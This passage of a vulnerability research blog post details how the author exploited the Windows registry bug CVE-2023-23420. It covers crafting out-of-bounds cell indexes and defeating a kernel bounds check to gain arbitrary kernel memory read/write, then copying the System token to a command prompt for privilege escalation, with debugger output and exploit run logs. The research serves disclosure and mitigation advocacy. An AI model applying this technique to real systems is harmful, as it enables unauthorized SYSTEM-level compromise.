_HMAP_TABLE * *]     0xffff82828fe6a000 [Type: _HMAP_TABLE *] 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm) (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)                     : 0xffff82828fc1b038 [Type: _CM_RM * *]     0xffff82828fdcc8e0 [Type: _CM_RM *] In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18). 0: kd> dx (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive) (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)                 : 0xffff82828fdcc930 [Type: _CMHIVE * *]     0xffff82828fc1a000 [Type: _CMHIVE *] So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3. Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure. 0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0+3*0x18 nt!_HMAP_ENTRY    +0x000 BlockOffset      : 0    +0x008 PermanentBinAddress : 0xffff8282`8fc1a000    +0x010 MemAlloc         : 0 The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zero'ed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example. We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function: >>> def MakeCellIndex(storage, directory, table, offset): ...     print("0x%x" % ((storage << 31) | (directory << 21) | (table << 12) | offset)) ... And then pass the values we have established so far: >>> MakeCellIndex(1, 0x193, 3, 0) 0xb2603000 >>> So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended. 0: kd> !reg cellindex ffff82828fc1a000 b2603000 Map = ffff82828fc1a3a0 Type = 1 Table = 193 Block = 3 Offset = 0 MapTable     = ffff82828fdcc8e0  MapEntry     = ffff82828fdcc928  BinAddress = ffff82828fc1a000, BlockOffset = 0000000000000000 BlockAddress = ffff82828fc1a000  pcell:  ffff82828fc1a004 Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.Writing the exploit At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.Step 0: Choosing the vulnerability Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.CVE-2022-34707 The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes. Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.CVE-2023-23420 This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations. In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle. So let's get to work!Step 1: Abusing the UAF to establish dynamically-controlled value cells Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout: At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent. Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps: Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).Committing the entire transaction by calling the NtCommitRegistryTransaction syscall. After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly: We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome: All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps: Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key. At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations. This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData". This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us. If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation. This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity. Step 2: Getting read/write access to the CMHIVE kernel object Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool. If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise: This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information: Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. nt!DbgBreakPointWithStatus: fffff800`8061ff20 cc              int     3 0: kd> !analyze -v ******************************************************************************* *                                                                             * *                        Bugcheck Analysis                                    * *                                                                             * ******************************************************************************* REGISTRY_ERROR (51) Something has gone badly wrong with the registry.  If a kernel debugger is available, get a stack trace. It can also indicate that the registry got an I/O error while trying to read one of its files, so it can be caused by hardware problems or filesystem corruption. It may occur due to a failure in a refresh operation, which is used only in by the security system, and then only when resource limits are encountered. Arguments: Arg1: 0000000000000001, (reserved) Arg2: ffffd4855dc36000, (reserved) Arg3: 00000000b2603000, depends on where Windows BugChecked, may be pointer to hive Arg4: 000000000000025d, depends on where Windows BugChecked, may be return code of         HvCheckHive if the hive is corrupt. [...] 0: kd> k  # Child-SP          RetAddr               Call Site 00 ffff828b`b100be68 fffff800`80763642     nt!DbgBreakPointWithStatus 01 ffff828b`b100be70 fffff800`80762e81     nt!KiBugCheckDebugBreak+0x12 02 ffff828b`b100bed0 fffff800`80617957     nt!KeBugCheck2+0xa71 03 ffff828b`b100c640 fffff800`80a874d5     nt!KeBugCheckEx+0x107 04 ffff828b`b100c680 fffff800`8089dfd5     nt!HvpReleaseCellPaged+0x1ec1a5 05 ffff828b`b100c6c0 fffff800`808a29be     nt!CmpQueryKeyValueData+0x1a5 06 ffff828b`b100c770 fffff800`808a264e     nt!CmEnumerateValueKey+0x13e 07 ffff828b`b100c840 fffff800`80629e75     nt!NtEnumerateValueKey+0x31e 08 ffff828b`b100ca70 00007ff8`242c4114     nt!KiSystemServiceCopyEnd+0x25 09 00000008`c747dc38 00000000`00000000     0x00007ff8`242c4114 We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series. To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:   _HV_GET_CELL_CONTEXT Context;   //   // Translate the cell index to virtual address   //   PVOID CellAddress = Hive->GetCellRoutine(Hive, CellIndex, &Context);   //   // Operate on the cell view using the CellAddress pointer   //   ...   //   // Release the cell   //   Hive->ReleaseCellRoutine(Hive, &Context) There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was not only used for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls. The presence or absence of the "release" function in consecutive Windows versions is shown below:Windows NT 3.1 – 2000: ❌Windows XP – 7: ✅Windows 8 – 8.1: ❌Windows 10 – 11: ✅ Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x: VOID HvpReleaseCellPaged(_CMHIVE *CmHive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX RealCell;   _HMAP_ENTRY *MapEntry;   RealCell = Context->Cell & 0xFFFFFFFE;   MapEntry = HvpGetCellMap(&CmHive->Hive, RealCell);   if (MapEntry == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, CmHive, RealCell, 0x291);   }   if ((Context->Cell & 1) != 0) {     HvpMapEntryReleaseBinAddress(MapEntry);   }   HvpGetCellContextReinitialize(Context); } _HMAP_ENTRY *HvpGetCellMap(_HHIVE *Hive, _HCELL_INDEX CellIndex) {   DWORD StorageType = CellIndex >> 31;   DWORD StorageIndex = CellIndex & 0x7FFFFFFF;   if (StorageIndex < Hive->Storage[StorageType].Length) {     return &Hive->Storage[StorageType].Map                                      ->Directory[(CellIndex >> 21) & 0x3FF]                                      ->Table[(CellIndex >> 12) & 0x1FF];   } else {     return NULL;   } } VOID HvpMapEntryReleaseBinAddress(_HMAP_ENTRY *MapEntry) {   ExReleaseRundownProtection(&MapEntry->TemporaryBinRundown); } VOID HvpGetCellContextReinitialize(_HV_GET_CELL_CONTEXT *Context) {   Context->Cell = -1;   Context->Hive = NULL; } As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRunDown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered. This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form: VOID HvpReleaseCellPaged(_HHIVE *Hive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX Cell = Context->Cell;   DWORD StorageIndex = Cell & 0x7FFFFFFF;   DWORD StorageType = Cell >> 31;   if (StorageIndex >= Hive->Storage[StorageType].Length ||       &Hive->Storage[StorageType].Map->Directory[(Cell >> 21) & 0x3FF]->Table[(Cell >> 12) & 0x1FF] == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);   }   Context->Cell = -1;   Context->BinContext = 0; } The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead? As it turns out, not necessarily. Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let's take another look at the if statement that stands in our way: if (StorageIndex >= Hive->Storage[StorageType].Length || /* ... */) {   KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267); } The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure. On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage: 0: kd> dx (&((_HHIVE*)0)->Storage[0].Length) (&((_HHIVE*)0)->Storage[0].Length)                 : 0x118 0: kd> dx (&((_HHIVE*)0)->Storage[1].Length) (&((_HHIVE*)0)->Storage[1].Length)                 : 0x390 As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above, we can obtain an index that points directly to the Length field. Let's test this in practice: 0: kd> dx (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)  (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)                  : 0xffff810713f82390 0: kd> !reg cellindex 0xffff810713f82000 0xB2603390-4 Map = ffff810713f823a0 Type = 1 Table = 193 Block = 3 Offset = 38c MapTable     = ffff810713debe90  MapEntry     = ffff810713debed8  BinAddress = ffff810713f82000, BlockOffset = 0000000000000000 BlockAddress = ffff810713f82000  pcell:  ffff810713f82390 So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps: Crafting a controlled registry value with a data index of 0xB260338C.Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted. As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability. To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place. The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future. For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path. Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor: It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory: 0: kd> dt _HHIVE ffff810713f82000 nt!_HHIVE    +0x000 Signature        : 0xbee0bee0    +0x008 GetCellRoutine   : 0xfffff801`8049b370     _CELL_DATA*  nt!HvpGetCellPaged+0    +0x010 ReleaseCellRoutine : 0xfffff801`8049b330     void  nt!HvpReleaseCellPaged+0    +0x018 Allocate         : 0xfffff801`804cae30     void*  nt!CmpAllocate+0    +0x020 Free             : 0xfffff801`804c9100     void  nt!CmpFree+0    +0x028 FileWrite        : 0xfffff801`80595e00     long  nt!CmpFileWrite+0    +0x030 FileRead         : 0xfffff801`805336a0     long  nt!CmpFileRead+0    +0x038 HiveLoadFailure  : (null)    +0x040 BaseBlock        : 0xffff8107`13f9a000 _HBASE_BLOCK [...] Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!Step 3: Getting arbitrary read/write access to the entire kernel address space At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be. If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically—based solely on how the registry works—contain the data from that address, available for both reading and writing. This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation—something that doesn't happen very often. 🙂 The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr. In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences: _CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU)._CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives. For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list. The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18 byte area that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields: _CMHIVE layout _HMAP_ENTRY layout +0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT +0x000 BlockOffset         : Uint8B +0xb78 RootKcb          : Ptr64 _CM_KEY_CONTROL_BLOCK +0x008 PermanentBinAddress : Uint8B +0xb80 Frozen           : UChar +0x010 MemAlloc            : Uint4B On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number. As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F. Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose: >>> MakeCellIndex(1, 0x7F, 0x29, 0) 0x8fe29000 So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below: The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left. The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers. As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved. We could end this section right here, but there is one more minor issue I'd like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement: return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration. So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations: The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything. However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg: 0: kd> ? nt Evaluate expression: -8781857554432 = fffff803`50800000 0: kd> db /c8 fffff803`50800004 fffff803`50800004  03 00 00 00 04 00 00 00  ........ fffff803`5080000c  ff ff 00 00 b8 00 00 00  ........ fffff803`50800014  00 00 00 00 40 00 00 00  ....@... fffff803`5080001c  00 00 00 00 00 00 00 00  ........ fffff803`50800024  00 00 00 00 00 00 00 00  ........ fffff803`5080002c  00 00 00 00 00 00 00 00  ........ fffff803`50800034  00 00 00 00 00 00 00 00  ........ fffff803`5080003c  10 01 00 00 0e 1f ba 0e  ........ fffff803`50800044  00 b4 09 cd 21 b8 01 4c  ....!..L fffff803`5080004c  cd 21 54 68 69 73 20 70  .!This p fffff803`50800054  72 6f 67 72 61 6d 20 63  rogram c fffff803`5080005c  61 6e 6e 6f 74 20 62 65  annot be And then let's browse to the same address using our FakeKey in Regedit: The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC. An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂Step 4: Elevating process security token With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below. This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit looks as follows: C:\Users\user\Desktop\exploits>Exploit.exe C:\users\user\Desktop\become_admin.reg [+] Found kernel base address: fffff80350800000 [+] Spawning a command prompt... [+] Found PID 6892 at address ffff8107b3864080 [+] System process: ffff8107ad0ed040, security token: ffffc608b4c8a943 [+] Exploit succeeded, enjoy! C:\Users\user\Desktop\exploits> Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges: As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation: Final thoughts Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken: To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.Exploit mitigations The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical. Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in 